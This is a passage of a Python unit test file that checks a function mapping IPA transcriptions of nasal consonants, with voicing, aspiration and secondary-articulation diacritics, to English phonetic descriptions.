actual = describe_transcription("m̥ʰ")
self.assertEqual(actual, expected)
def test_m̊ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized bilabial nasal pulmonic egressive consonant
def test_m̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰʷ")
self.assertEqual(actual, expected)
def test_m̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized bilabial nasal pulmonic egressive consonant
def test_m̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰʲ")
self.assertEqual(actual, expected)
def test_m̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized bilabial nasal pulmonic egressive consonant
def test_m̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰˠ")
self.assertEqual(actual, expected)
def test_m̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized bilabial nasal pulmonic egressive consonant
def test_m̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰˤ")
self.assertEqual(actual, expected)
def test_m̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰˤ")
self.assertEqual(actual, expected)
# voiced bilabial nasal pulmonic egressive consonant
def test_m_is_the_representation_of_the_voiced_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m")
self.assertEqual(actual, expected)
# voiced labialized bilabial nasal pulmonic egressive consonant
def test_mʷ_is_the_representation_of_the_voiced_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʷ")
self.assertEqual(actual, expected)
# voiced palatalized bilabial nasal pulmonic egressive consonant
def test_mʲ_is_the_representation_of_the_voiced_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʲ")
self.assertEqual(actual, expected)
# voiced velarized bilabial nasal pulmonic egressive consonant
def test_mˠ_is_the_representation_of_the_voiced_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized bilabial nasal pulmonic egressive consonant
def test_mˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mˤ")
self.assertEqual(actual, expected)
# voiced aspirated bilabial nasal pulmonic egressive consonant
def test_mʰ_is_the_representation_of_the_voiced_aspirated_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰ")
self.assertEqual(actual, expected)
def test_m̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized bilabial nasal pulmonic egressive consonant
def test_mʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰʷ")
self.assertEqual(actual, expected)
def test_m̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized bilabial nasal pulmonic egressive consonant
def test_mʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰʲ")
self.assertEqual(actual, expected)
def test_m̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized bilabial nasal pulmonic egressive consonant
def test_mʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰˠ")
self.assertEqual(actual, expected)
def test_m̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized bilabial nasal pulmonic egressive consonant
def test_mʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰˤ")
self.assertEqual(actual, expected)
def test_m̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar nasal pulmonic egressive consonant
def test_n̊_is_the_representation_of_the_voiceless_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊")
self.assertEqual(actual, expected)
def test_n̥_is_the_representation_of_the_voiceless_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar nasal pulmonic egressive consonant
def test_n̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʷ")
self.assertEqual(actual, expected)
def test_n̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar nasal pulmonic egressive consonant
def test_n̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʲ")
self.assertEqual(actual, expected)
def test_n̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar nasal pulmonic egressive consonant
def test_n̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ˠ")
self.assertEqual(actual, expected)
def test_n̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar nasal pulmonic egressive consonant
def test_n̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ˤ")
self.assertEqual(actual, expected)
def test_n̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar nasal pulmonic egressive consonant
def test_n̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰ")
self.assertEqual(actual, expected)
def test_n̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar nasal pulmonic egressive consonant
def test_n̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰʷ")
self.assertEqual(actual, expected)
def test_n̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar nasal pulmonic egressive consonant
def test_n̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰʲ")
self.assertEqual(actual, expected)
def test_n̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar nasal pulmonic egressive consonant
def test_n̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰˠ")
self.assertEqual(actual, expected)
def test_n̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar nasal pulmonic egressive consonant
def test_n̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̥ʰˤ")
self.assertEqual(actual, expected)
def test_n̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar nasal pulmonic egressive consonant
def test_n_is_the_representation_of_the_voiced_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n")
self.assertEqual(actual, expected)
# voiced labialized alveolar nasal pulmonic egressive consonant
def test_nʷ_is_the_representation_of_the_voiced_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar nasal pulmonic egressive consonant
def test_nʲ_is_the_representation_of_the_voiced_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar nasal pulmonic egressive consonant
def test_nˠ_is_the_representation_of_the_voiced_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar nasal pulmonic egressive consonant
def test_nˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar nasal pulmonic egressive consonant
def test_nʰ_is_the_representation_of_the_voiced_aspirated_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰ")
self.assertEqual(actual, expected)
def test_n̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar nasal pulmonic egressive consonant
def test_nʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰʷ")
self.assertEqual(actual, expected)
def test_n̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar nasal pulmonic egressive consonant
def test_nʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰʲ")
self.assertEqual(actual, expected)
def test_n̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar nasal pulmonic egressive consonant
def test_nʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰˠ")
self.assertEqual(actual, expected)
def test_n̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar nasal pulmonic egressive consonant
def test_nʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("nʰˤ")
self.assertEqual(actual, expected)
def test_n̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar nasal pulmonic egressive consonant"
actual = describe_transcription("n̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless palatal nasal pulmonic egressive consonant
def test_ɲ̊_is_the_representation_of_the_voiceless_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊")
self.assertEqual(actual, expected)
def test_ɲ̥_is_the_representation_of_the_voiceless_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥")
self.assertEqual(actual, expected)
# voiceless labialized palatal nasal pulmonic egressive consonant
def test_ɲ̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʷ")
self.assertEqual(actual, expected)
def test_ɲ̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized palatal nasal pulmonic egressive consonant
def test_ɲ̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʲ")
self.assertEqual(actual, expected)
def test_ɲ̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized palatal nasal pulmonic egressive consonant
def test_ɲ̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ˠ")
self.assertEqual(actual, expected)
def test_ɲ̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized palatal nasal pulmonic egressive consonant
def test_ɲ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ˤ")
self.assertEqual(actual, expected)
def test_ɲ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized palatal nasal pulmonic egressive consonant
def test_ɲ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɲ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced palatal nasal pulmonic egressive consonant
def test_ɲ_is_the_representation_of_the_voiced_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ")
self.assertEqual(actual, expected)
# voiced labialized palatal nasal pulmonic egressive consonant
def test_ɲʷ_is_the_representation_of_the_voiced_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʷ")
self.assertEqual(actual, expected)
# voiced palatalized palatal nasal pulmonic egressive consonant
def test_ɲʲ_is_the_representation_of_the_voiced_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʲ")
self.assertEqual(actual, expected)
# voiced velarized palatal nasal pulmonic egressive consonant
def test_ɲˠ_is_the_representation_of_the_voiced_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized palatal nasal pulmonic egressive consonant
def test_ɲˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲˤ")
self.assertEqual(actual, expected)
# voiced aspirated palatal nasal pulmonic egressive consonant
def test_ɲʰ_is_the_representation_of_the_voiced_aspirated_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized palatal nasal pulmonic egressive consonant
def test_ɲʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰʷ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized palatal nasal pulmonic egressive consonant
def test_ɲʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰʲ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized palatal nasal pulmonic egressive consonant
def test_ɲʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰˠ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized palatal nasal pulmonic egressive consonant
def test_ɲʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲʰˤ")
self.assertEqual(actual, expected)
def test_ɲ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal nasal pulmonic egressive consonant"
actual = describe_transcription("ɲ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless retroflex nasal pulmonic egressive consonant
def test_ɳ̊_is_the_representation_of_the_voiceless_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊")
self.assertEqual(actual, expected)
def test_ɳ̥_is_the_representation_of_the_voiceless_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex nasal pulmonic egressive consonant
def test_ɳ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʷ")
self.assertEqual(actual, expected)
def test_ɳ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex nasal pulmonic egressive consonant
def test_ɳ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʲ")
self.assertEqual(actual, expected)
def test_ɳ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex nasal pulmonic egressive consonant
def test_ɳ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ˠ")
self.assertEqual(actual, expected)
def test_ɳ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex nasal pulmonic egressive consonant
def test_ɳ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ˤ")
self.assertEqual(actual, expected)
def test_ɳ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ˤ")
self.assertEqual(actual, expected)
